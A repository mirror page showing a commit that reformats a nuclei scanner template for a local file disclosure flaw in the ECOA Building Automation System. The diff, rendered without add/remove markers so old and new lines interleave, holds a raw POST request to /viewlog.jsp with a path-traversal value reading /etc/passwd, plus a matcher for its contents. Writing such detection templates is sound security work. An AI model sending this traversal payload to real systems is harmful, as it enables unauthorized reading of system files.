daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update ecoa-building-automation-lfd.yaml

patch-1
Roberto Nunes 2021-09-15 07:24:11 +09:00 committed by GitHub
parent 01eb1cf559
commit 428be9721b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
ecoa-building-automation-lfd.yaml
View File

@ -1,30 +1,21 @@
id: ecoa-building-automation-lfd
info:
name: ECOA Building Automation System Local File Disclosure
info:
author: 0x_Akoko
name: "ECOA Building Automation System Local File Disclosure"
reference: "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php"
severity: high
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
tags: ecoa,lfi
tags: "ecoa,lfi"
requests:
- raw:
- |
POST /viewlog.jsp HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
matchers-condition: and
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
- "root:.*:0:0:"